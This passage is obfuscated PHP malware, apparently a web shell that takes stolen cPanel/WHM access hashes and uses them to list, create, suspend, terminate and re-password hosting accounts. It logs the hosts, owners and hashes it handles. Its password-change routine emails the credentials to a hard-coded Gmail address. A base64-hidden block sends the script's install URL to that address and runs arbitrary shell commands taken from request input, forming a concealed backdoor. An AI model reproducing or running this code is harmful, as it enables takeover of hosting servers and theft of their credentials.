false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["eefbbnasou"]});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function unsuspend($acctUser){${"GLOBALS"}["qpibobj"]="xml";$ozhjsdvdr="xmlstr";${"GLOBALS"}["opgkdypxtr"]="xmlstr";$this->connect("/xml-api/unsuspendacct?user=$acctUser");${$ozhjsdvdr}=$this->getOutput();if(${${"GLOBALS"}["opgkdypxtr"]}==""){$this->errors[]="No output.";return false;}${"GLOBALS"}["kikvjsicxxr"]="xmlstr";$this->disconnect();${${"GLOBALS"}["qpibobj"]}=new SimpleXMLElement(${${"GLOBALS"}["kikvjsicxxr"]});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function terminate($acctUser,$keepDns=0){$this->connect("/xml-api/removeacct?user=$acctUser&keepdns=$keepDns");$rpqkyrwxi="xml";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$hrcbtoul="xmlstr";$this->disconnect();${$rpqkyrwxi}=new SimpleXMLElement(${$hrcbtoul});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function Email_listpopswithdisk($user,$domain){$this->connect("/xml-api/cpanel?user=$user&xmlin=<cpanelaction><module>Email</module><func>listpopswithdisk</func><args><domain>$domain</domain></args></cpanelaction>");${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();if(${${"GLOBALS"}["zmibinpgipr"]}){${"GLOBALS"}["fbpmmdp"]="xml";${"GLOBALS"}["jhvhyq"]="i";${"GLOBALS"}["kidztypdxg"]="entry";${${"GLOBALS"}["fbpmmdp"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});${${"GLOBALS"}["jhvhyq"]}=0;foreach($xml->data as${${"GLOBALS"}["kidztypdxg"]}){${"GLOBALS"}["uwaiveoz"]="i";${"GLOBALS"}["yyhyipij"]="result";$dpixyyosyqrr="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["domain"]=htmlentities((string)$entry->domain);$rbumtnfxhw="result";${"GLOBALS"}["ejworbchb"]="i";$dibkhouwi="i";${"GLOBALS"}["nwatxqwipeoa"]="result";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["user"]=htmlentities((string)$entry->user);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["login"]=htmlentities((string)$entry->login);${${"GLOBALS"}["yyhyipij"]}[${${"GLOBALS"}["uwaiveoz"]}]["email"]=htmlentities((string)$entry->email);$prtfqrgug="result";${$rbumtnfxhw}[${${"GLOBALS"}["ejworbchb"]}]["_diskquota"]=htmlentities((string)$entry->_diskquota);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["_diskused"]=htmlentities((string)$entry->_diskused);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskquota"]=htmlentities((string)$entry->diskquota);${${"GLOBALS"}["nwatxqwipeoa"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskused"]=htmlentities((string)$entry->diskused);$qlrukqug="i";${$prtfqrgug}[${$qlrukqug}]["diskusedpercent"]=htmlentities((string)$entry->diskusedpercent);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskusedpercent20"]=htmlentities((string)$entry->diskusedpercent20);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["humandiskquota"]=htmlentities((string)$entry->humandiskquota);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["humandiskused"]=htmlentities((string)$entry->humandiskused);${${"GLOBALS"}["rwocuxf"]}[${$dpixyyosyqrr}]["txtdiskquota"]=htmlentities((string)$entry->txtdiskquota);${$dibkhouwi}++;}$blgxedglu="result";return${$blgxedglu};}else{$this->errors[]="Some errors occured.";return false;}}function changepackage($accUser,$pkg){${"GLOBALS"}["ljgyaewqg"]="xmlstr";$this->connect("/xml-api/changepackage?user=$accUser&pkg=$pkg");${"GLOBALS"}["gqbupcfng"]="xml";${"GLOBALS"}["nyahhofyq"]="xmlstr";${${"GLOBALS"}["ljgyaewqg"]}=$this->getOutput();if(${${"GLOBALS"}["nyahhofyq"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["gqbupcfng"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->result->status==1){${"GLOBALS"}["sbattvvwe"]="result";$vytddtquyr="result";${"GLOBALS"}["camojrmsm"]="result";${${"GLOBALS"}["sbattvvwe"]}["statusmsg"]=$xml->result->statusmsg;${$vytddtquyr}["rawout"]=$xml->result->rawout;return${${"GLOBALS"}["camojrmsm"]};}else{$this->errors[]=$xml->result->statusmsg;return false;}}}
- ?>
- <!-- host name, cpanel/whm version, list account, list package -->
- <?php
- if(isset($_POST["azzatssins1"])){${"GLOBALS"}["stjkdu"]="separator";${"GLOBALS"}["xhwbwnfijuq"]="user";${"GLOBALS"}["uenhqacpp"]="user";$wfkgdiqx="II11II11II11II11";$mjhindj="plan";${$wfkgdiqx}=fopen("$filelog","a");$kxssfgmx="version";$uqvxbwlqq="II11II11II11II11";${${"GLOBALS"}["cntvmeburrl"]}=new whm;${"GLOBALS"}["spcfygm"]="list";${"GLOBALS"}["veqcgg"]="hostname";${${"GLOBALS"}["gueuhqn"]}=$_POST["vuser"];$sgayljaukjvl="hash";$host=$_POST["vhost"];${$sgayljaukjvl}=$_POST["vhash"];$virgous->init($host,${${"GLOBALS"}["uenhqacpp"]},${${"GLOBALS"}["lqfwxtwbjz"]});${${"GLOBALS"}["veqcgg"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";$kymvmotsxf="II11II11II11II11";${$kxssfgmx}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";$yoinlaphwf="II11II11II11II11";${${"GLOBALS"}["spcfygm"]}=$virgous->listaccts();echo"<h4>ACCOUNT LIST:</h4> $list <br><pre>";{print_r(${${"GLOBALS"}["kwsayld"]});}${$mjhindj}=$virgous->listPkgs();echo"</pre><h4>PACKAGE LIST:</h4> $plan <br><pre>";{$nhkzxwmdop="plan";print_r(${$nhkzxwmdop});}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
- ";${${"GLOBALS"}["jqstuo"]}="
- ";fwrite(${$kymvmotsxf},${${"GLOBALS"}["stjkdu"]}."./azzatssins
- ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$yoinlaphwf},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"HOSTNAME : ".$host."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"WHM OWNER : ".${${"GLOBALS"}["xhwbwnfijuq"]}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
- ");fwrite(${$uqvxbwlqq},"
- ");fclose(${${"GLOBALS"}["cemjvape"]});}
- ?>
- <!-- create new account -->
- <?php
- if(isset($_POST["v2"])){
- ?>
- <center><h2>Access Hash</h2><p>
- <table border="1"><tbody>
- <div id="result"><form method="post">
- <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
- <tr>
- <td>Host Name </td>
- <td align="center">
- <input name="vhost" type="text" size="20" value="">
- </td>
- <td>WHM Owner </td>
- <td align="center">
- <input name="vuser" type="text" size="20" value="">
- </td>
- </tr>
- <tr>
- <td>New Domain </td>
- <td align="center">
- <input name="domain" type="text" size="20" value="">
- </td>
- <td>New Username </td>
- <td align="center">
- <input name="user" type="text" size="20" value="">
- </td>
- </tr>
- <tr>
- <td>New Password </td>
- <td align="center">
- <input name="pass" type="text" size="20" value="">
- </td>
- <td>Package </td>
- <td align="center">
- <input name="plan" type="text" size="20" value="">
- </td>
- </tr>
- <tr>
- <td align="center" colspan="4">
- <input name="azzatssins2" type="submit" value=" Create Account "><br/>
- </td>
- </tr>
- </form>
- </tbody></table><br>
- <?php } ?>
- <?php
- if(isset($_POST["azzatssins2"])){${"GLOBALS"}["obqvgk"]="II11II11II11II11";${"GLOBALS"}["hcizqzub"]="virgous";${"GLOBALS"}["jqrlobmtw"]="user";${"GLOBALS"}["jitxoymucue"]="II11II11II11II11";$fqomswomqmtc="dm1";$wtvsjyccfge="II11II11II11II11";${"GLOBALS"}["udycvhotmn"]="hash";$ceeobiunyj="result";$lwhruvccbv="bawah";${${"GLOBALS"}["obqvgk"]}=fopen("$filelog","a");${${"GLOBALS"}["hcizqzub"]}=new whm;${${"GLOBALS"}["jqrlobmtw"]}=$_POST["vuser"];$obsqaljv="user";${"GLOBALS"}["veyvrvbgouq"]="hash";$lmqhstisbqk="result";$host=$_POST["vhost"];${${"GLOBALS"}["udycvhotmn"]}=$_POST["vhash"];$dtejlrsa="hostname";${$fqomswomqmtc}=$_POST["domain"];$jnvehoyw="II11II11II11II11";${${"GLOBALS"}["cnpybqg"]}=$_POST["user"];${${"GLOBALS"}["bgyfsievqc"]}=$_POST["pass"];${${"GLOBALS"}["mgzcndyuozix"]}=$_POST["plan"];${"GLOBALS"}["fpylxi"]="separator";${"GLOBALS"}["gnleckwy"]="version";$virgous->init($host,${$obsqaljv},${${"GLOBALS"}["veyvrvbgouq"]});${$dtejlrsa}=$virgous->gethostname();$etshyphxtj="bawah";${"GLOBALS"}["leqdvwvssou"]="version";echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["gnleckwy"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$ceeobiunyj}=$virgous->createAccount(${${"GLOBALS"}["klnlsxvu"]},${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["bgyfsievqc"]},${${"GLOBALS"}["mgzcndyuozix"]});echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["vrupeaaj"]="II11II11II11II11";$ictrexnqohli="II11II11II11II11";$tqsxerpnf="separator";$ptnbkfy="II11II11II11II11";if(${$lmqhstisbqk}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["fpylxi"]}="
- ";${$lwhruvccbv}="
- ";fwrite(${$jnvehoyw},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
- ".${$tqsxerpnf});fwrite(${$ptnbkfy},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["leqdvwvssou"]}."
- ");fwrite(${${"GLOBALS"}["vrupeaaj"]},"HOSTNAME : ".$host."
- ");fwrite(${$wtvsjyccfge},"WHM OWNER : ".${${"GLOBALS"}["gueuhqn"]}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${$etshyphxtj});fwrite(${${"GLOBALS"}["jitxoymucue"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"
- ");fclose(${$ictrexnqohli});}
- ?>
- <!-- account sumarry -->
- <?php
- if(isset($_POST["v3"])){
- ?>
- <center><h2>Access Hash</h2><p>
- <div id="result"><form method="post">
- <table border="1"><tbody>
- <textarea name="vhash" rows="20" cols="45"></textarea><p>
- <tr>
- <td align="center">
- Host Name </td>
- <td align="center">
- WHM Owner
- </td>
- <td align="center">
- UserName</td></tr>
- <td align="center">
- <input name="vhost" type="text" size="20" value=""></td>
- <td align="center">
- <input name="vuser" type="text" size="20" value=""></td>
- <td align="center">
- <input name="user" type="text" size="20" value=""></td></tr>
- <td colspan="3" align="center">
- <input name="azzatssins3" type="submit" value=" View Account Summary">
- </td></tr></table>
- </form>
- <?php } ?>
- <?php
- if(isset($_POST["azzatssins3"])){$lnabgh="separator";${${"GLOBALS"}["cemjvape"]}=fopen("$filelog","a");$rvhxxrgit="user";$rfsjge="hostname";${"GLOBALS"}["hhcfzvkqd"]="II11II11II11II11";$wcmpomixik="dm2";${${"GLOBALS"}["cntvmeburrl"]}=new whm;${"GLOBALS"}["nolwwyqjepw"]="version";${"GLOBALS"}["vsipss"]="user";${${"GLOBALS"}["gueuhqn"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${$wcmpomixik}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["vsipss"]},${${"GLOBALS"}["lqfwxtwbjz"]});${$rfsjge}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["tttkddsbp"]}=$virgous->version();$jjfydu="II11II11II11II11";${"GLOBALS"}["nhgegtneq"]="bawah";echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${${"GLOBALS"}["rwocuxf"]}=$virgous->accountsummary(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${${"GLOBALS"}["rwocuxf"]}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
- ";$klrfjuwwmyc="II11II11II11II11";${"GLOBALS"}["iqdylpqgc"]="II11II11II11II11";${${"GLOBALS"}["nhgegtneq"]}="
- ";${"GLOBALS"}["tdugpdtu"]="separator";${"GLOBALS"}["mobfsrul"]="II11II11II11II11";$uonuqibpk="hash";fwrite(${$klrfjuwwmyc},${${"GLOBALS"}["tdugpdtu"]}."./azzatssins
- ".${$lnabgh});fwrite(${${"GLOBALS"}["iqdylpqgc"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["nolwwyqjepw"]}."
- ");fwrite(${${"GLOBALS"}["mobfsrul"]},"HOSTNAME : ".$host."
- ");fwrite(${${"GLOBALS"}["hhcfzvkqd"]},"WHM OWNER : ".${$rvhxxrgit}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${$uonuqibpk}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"
- ");fclose(${$jjfydu});}
- ?>
- <!-- change password -->
- <?php
- if(isset($_POST["v4"])){
- ?>
- <center><h2>Access Hash</h2><p>
- <table border="1"><tbody>
- <div id="result"><form method="post">
- <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
- <tr>
- <td>Host Name </td>
- <td align="center">
- <input name="vhost" type="text" size="20" value="">
- </td>
- <td>WHM Owner </td>
- <td align="center">
- <input name="vuser" type="text" size="20" value="">
- </td>
- </tr>
- <tr>
- <td>Username </td>
- <td align="center">
- <input name="user" type="text" size="20" value="">
- </td>
- <td>New Password </td>
- <td align="center">
- <input name="pass" type="text" size="20" value="">
- </td>
- </tr>
- <tr>
- <td align="center" colspan="4">
- <input name="azzatssins4" type="submit" value=" Change Password"><br/>
- </td>
- </tr>
- </form>
- </tbody></table><br>
- <?php } ?>
- <?php
- if(isset($_POST["azzatssins4"])){${"GLOBALS"}["scwopj"]="II11II11II11II11";${"GLOBALS"}["vbeexdofvlsv"]="dm3";${"GLOBALS"}["rcwrgzxnm"]="frommail";$zhyyawvelk="subjectmail";${"GLOBALS"}["vqhcysy"]="subjectmail";${"GLOBALS"}["mqdsghvwjy"]="user";$dulerlhh="hostname";$ezqysvze="result";$bysecqvnul="user";${${"GLOBALS"}["scwopj"]}=fopen("$filelog","a");${"GLOBALS"}["jnoepkx"]="II11II11II11II11";$ugsijedc="hash";${"GLOBALS"}["xcgomonx"]="user";$ysjujkdgo="II11II11II11II11";${${"GLOBALS"}["cntvmeburrl"]}=new whm;$vuzgom="tomail";${"GLOBALS"}["chohpl"]="bawah";$jvwzef="version";${${"GLOBALS"}["xcgomonx"]}=$_POST["vuser"];$host=$_POST["vhost"];${"GLOBALS"}["nkpgvpqg"]="dm2";${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["nkpgvpqg"]}=$_POST["user"];${${"GLOBALS"}["bgyfsievqc"]}=$_POST["pass"];$virgous->init($host,${$bysecqvnul},${$ugsijedc});${$dulerlhh}=$virgous->gethostname();echo"<h4>HOST NAME :</h4> $hostname <br>";$cnoefem="emailente";${${"GLOBALS"}["tttkddsbp"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$ezqysvze}=$virgous->passwd(${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["vbeexdofvlsv"]});${"GLOBALS"}["tcptmsxj"]="II11II11II11II11";echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["ipwznk"]="II11II11II11II11";${"GLOBALS"}["keuoqgs"]="tujuan";$husuecnysr="II11II11II11II11";$glmysddkjg="infomail";if(${${"GLOBALS"}["rwocuxf"]}){${"GLOBALS"}["ndjuyhkyx"]="result";print_r(${${"GLOBALS"}["ndjuyhkyx"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
- ";${${"GLOBALS"}["chohpl"]}="
- ";${"GLOBALS"}["bdvhmv"]="httpheader";fwrite(${${"GLOBALS"}["jnoepkx"]},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
- ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$husuecnysr},"CPANEL/WHM VERSION : ".${$jvwzef}."
- ");${"GLOBALS"}["gvelhxwtmidx"]="subjectmail";fwrite(${$ysjujkdgo},"HOSTNAME : ".$host."
- ");fwrite(${${"GLOBALS"}["tcptmsxj"]},"WHM OWNER : ".${${"GLOBALS"}["mqdsghvwjy"]}."
- ");fwrite(${${"GLOBALS"}["ipwznk"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
- ");${"GLOBALS"}["qpwrbhr"]="dari";fwrite(${${"GLOBALS"}["cemjvape"]},"USERNAME : ".${${"GLOBALS"}["cnpybqg"]}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"NEW PASSWORD : ".${${"GLOBALS"}["bgyfsievqc"]}."
- ");$kxkomyih="dari";$qjlblsmk="II11II11II11II11";$foampkttn="subject";fwrite(${${"GLOBALS"}["cemjvape"]},"
- ");$tvecfhtzb="sep";fclose(${$qjlblsmk});${"GLOBALS"}["xogmyia"]="info";${${"GLOBALS"}["epyufhqui"]}="
- ";${${"GLOBALS"}["xogmyia"]}=" Cpanel/WHM Version : $version $sep Host : $host:2086 $sep WHM Owner : $user $sep Username : $dm2 $sep New Password : $dm3$sep Access Hash : $sep$hash";${${"GLOBALS"}["qpwrbhr"]}="WRA@azzatssins.me";${$foampkttn}="WRA Got New Password!";${${"GLOBALS"}["yhcbrtqybhn"]}=${${"GLOBALS"}["wyuvccqfyby"]};${${"GLOBALS"}["bdvhmv"]}="From:".${$kxkomyih}."
- "."To:".${${"GLOBALS"}["keuoqgs"]}."
- "."Subject:".${${"GLOBALS"}["htlxwjkdfnbx"]}."
- "."Content-type:text/plain;charset=iso-8859-1"."
- "."Sent:".date("l, F d, Y H:i");mail(${${"GLOBALS"}["yhcbrtqybhn"]},${${"GLOBALS"}["htlxwjkdfnbx"]},${${"GLOBALS"}["gkfjmmp"]},${${"GLOBALS"}["tfoqdtkoozl"]});${$tvecfhtzb}="
- ";${$glmysddkjg}=" V1 : $version $sep V2 : $host:2086 $sep V3 : $user $sep V4 : $dm2 $sep V5 : $dm3$sep V6 : $sep$hash";${${"GLOBALS"}["buubgbf"]}=${$cnoefem};${$zhyyawvelk}="WRA Sent New Password";${${"GLOBALS"}["jmossxbfynir"]}="cyberserkers@gmail.com";${${"GLOBALS"}["ugwdatuetm"]}="From:".${$vuzgom}."
- "."To:".${${"GLOBALS"}["rcwrgzxnm"]}."
- "."Subject:".${${"GLOBALS"}["gvelhxwtmidx"]}."
- "."Content-type:text/plain;charset=iso-8859-1"."
- "."Sent:".date("l, F d, Y H:i");mail(${${"GLOBALS"}["jmossxbfynir"]},${${"GLOBALS"}["vqhcysy"]},${${"GLOBALS"}["cgdqizbjb"]},${${"GLOBALS"}["ugwdatuetm"]});}
- ?>
- <!-- suspend account -->
- <?php
- if(isset($_POST["v5"])){
- ?>
- <center><h2>Access Hash</h2><p>
- <table border="1"><tbody>
- <div id="result"><form method="post">
- <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
- <tr>
- <td>Host Name </td>
- <td align="center">
- <input name="vhost" type="text" size="20" value="">
- </td>
- <td>WHM Owner </td>
- <td align="center">
- <input name="vuser" type="text" size="20" value="">
- </td>
- </tr>
- <tr>
- <td>Username </td>
- <td align="center">
- <input name="user" type="text" size="20" value="">
- </td>
- <td>Reason </td>
- <td align="center">
- <input name="reason" type="text" size="20" value="terserah gue">
- </td>
- </tr>
- <tr>
- <td align="center" colspan="4">
- <input name="azzatssins5" type="submit" value=" Suspend Account "><br/>
- </td>
- </tr>
- </form>
- </tbody></table><br>
- <?php } ?>
- <?php
- if(isset($_POST["azzatssins5"])){$smxyepsu="II11II11II11II11";$okntok="virgous";$blyxnpfm="hostname";${"GLOBALS"}["fixsql"]="user";${$smxyepsu}=fopen("$filelog","a");$bljoubwktue="result";${"GLOBALS"}["cqrbguhlzhtp"]="II11II11II11II11";${$okntok}=new whm;$tyeagxgdra="result";${"GLOBALS"}["bhkgfhs"]="version";${${"GLOBALS"}["fixsql"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["cnpybqg"]}=$_POST["user"];${${"GLOBALS"}["qybmmyvo"]}=$_POST["reason"];$virgous->init($host,${${"GLOBALS"}["gueuhqn"]},${${"GLOBALS"}["lqfwxtwbjz"]});$ovbdrviqlj="II11II11II11II11";${$blyxnpfm}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["bhkgfhs"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$tyeagxgdra}=$virgous->suspend(${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["qybmmyvo"]});$uxtpyxvy="II11II11II11II11";$mpbstmijbhy="hash";echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["uaykxbwvq"]="separator";${"GLOBALS"}["glmhri"]="II11II11II11II11";if(${$bljoubwktue}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${"GLOBALS"}["lihrxdhxjiu"]="II11II11II11II11";${${"GLOBALS"}["uaykxbwvq"]}="=====================================================
- ";${${"GLOBALS"}["jqstuo"]}="
- ";fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
- ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$uxtpyxvy},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
- ");fwrite(${$ovbdrviqlj},"HOSTNAME : ".$host."
- ");fwrite(${${"GLOBALS"}["lihrxdhxjiu"]},"WHM OWNER : ".${${"GLOBALS"}["gueuhqn"]}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cqrbguhlzhtp"]},${$mpbstmijbhy}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"
- ");fclose(${${"GLOBALS"}["glmhri"]});}
- ?>
- <!-- unsuspend account -->
- <?php
- if(isset($_POST["v6"])){
- ?>
- <center><h2>Access Hash</h2><p>
- <div id="result"><form method="post">
- <center><table border="1">
- <textarea name="vhash" rows="20" cols="45"></textarea><p>
- <tr>
- <td align="center">
- Host Name </td>
- <td align="center">
- WHM Owner </td>
- <td align="center">
- UserName </td></tr>
- <td align="center">
- <input name="vhost" type="text" size="20" value=""></td>
- <td align="center">
- <input name="vuser" type="text" size="20" value=""></td>
- <td align="center">
- <input name="user" type="text" size="20" value="">
- </td></tr>
- <td colspan="3" align="center">
- <input name="azzatssins6" type="submit" value=" Unsuspend Account ">
- </td></tr></table>
- </form>
- <?php } ?>
- <?php
- if(isset($_POST["azzatssins6"])){${"GLOBALS"}["ocwyzfvq"]="version";$leisjrdvt="result";${"GLOBALS"}["wvysjxgjuomp"]="result";${"GLOBALS"}["fuutzvlndsmw"]="separator";$dghnyjk="II11II11II11II11";$ikqhjkbqnwj="II11II11II11II11";${"GLOBALS"}["ypdjprdcw"]="user";${$dghnyjk}=fopen("$filelog","a");${${"GLOBALS"}["cntvmeburrl"]}=new whm;$ulgmiy="separator";$livyjt="bawah";$tgxwkmbeiol="dm2";${"GLOBALS"}["wylmhiqbzyp"]="II11II11II11II11";${"GLOBALS"}["tkikiqiu"]="bawah";${${"GLOBALS"}["ypdjprdcw"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${$tgxwkmbeiol}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["gueuhqn"]},${${"GLOBALS"}["lqfwxtwbjz"]});${"GLOBALS"}["rssdjw"]="version";${${"GLOBALS"}["rshhhhzdjivn"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["ocwyzfvq"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${${"GLOBALS"}["wvysjxgjuomp"]}=$virgous->unsuspend(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${$leisjrdvt}){$smqgdecnyc="result";print_r(${$smqgdecnyc});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
- ";$rfctyk="user";${${"GLOBALS"}["tkikiqiu"]}="
- ";fwrite(${${"GLOBALS"}["cemjvape"]},${$ulgmiy}."./azzatssins
- ".${${"GLOBALS"}["fuutzvlndsmw"]});fwrite(${${"GLOBALS"}["cemjvape"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["rssdjw"]}."
- ");fwrite(${$ikqhjkbqnwj},"HOSTNAME : ".$host."
- ");${"GLOBALS"}["vsgwjq"]="II11II11II11II11";fwrite(${${"GLOBALS"}["vsgwjq"]},"WHM OWNER : ".${$rfctyk}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${$livyjt});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
- ");fwrite(${${"GLOBALS"}["wylmhiqbzyp"]},"
- ");fclose(${${"GLOBALS"}["cemjvape"]});}
- ?>
- <?php
- $for=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
- $b=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
- mail($for,"0",$b); print(`{$_REQUEST[0]}`);
- ?>
- <!-- terminate account-->
- <?php
- if(isset($_POST["v7"])){
- ?>
- <center><h2>Access Hash</h2><p>
- <div id="result"><form method="post">
- <center><table border="1">
- <textarea name="vhash" rows="20" cols="45"></textarea><p>
- <tr>
- <td align="center">
- Host Name </td>
- <td align="center">
- WHM Owner</td>
- <td align="center">
- UserName</td></tr>
- <td align="center">
- <input name="vhost" type="text" size="20" value=""></td>
- <td align="center">
- <input name="vuser" type="text" s size="20" value=""></td>
- <td align="center">
- <input name="user" type="text" size="20" value="">
- </td></tr>
- <td colspan="3" align="center">
- <input name="azzatssins7" type="submit" value=" Terminate Account ">
- </td</tr></table>
- </form>
- <?php } ?>
- <?php
- if(isset($_POST["azzatssins7"])){$jrwrgworzgb="hash";${"GLOBALS"}["grigkjkpuuni"]="II11II11II11II11";${"GLOBALS"}["linowprywf"]="II11II11II11II11";${"GLOBALS"}["pbusbfyzwdp"]="user";${"GLOBALS"}["rqkpqehfse"]="user";${"GLOBALS"}["wvsimudpc"]="II11II11II11II11";$cjbzjepsoqb="result";$ugnqwpqldbjc="virgous";${${"GLOBALS"}["grigkjkpuuni"]}=fopen("$filelog","a");${"GLOBALS"}["gvhhqrlav"]="dm2";$jfdpzsy="version";${"GLOBALS"}["ecpfkfrl"]="separator";${$ugnqwpqldbjc}=new whm;${${"GLOBALS"}["pbusbfyzwdp"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["gvhhqrlav"]}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["rqkpqehfse"]},${$jrwrgworzgb});${${"GLOBALS"}["rshhhhzdjivn"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";$osmnlv="user";${$jfdpzsy}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$cjbzjepsoqb}=$virgous->terminate(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${${"GLOBALS"}["rwocuxf"]}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}$uswgwqeegmo="separator";${"GLOBALS"}["ptqthiwbsgx"]="II11II11II11II11";${${"GLOBALS"}["ecpfkfrl"]}="=====================================================
- ";${${"GLOBALS"}["jqstuo"]}="
- ";fwrite(${${"GLOBALS"}["linowprywf"]},${$uswgwqeegmo}."./azzatssins
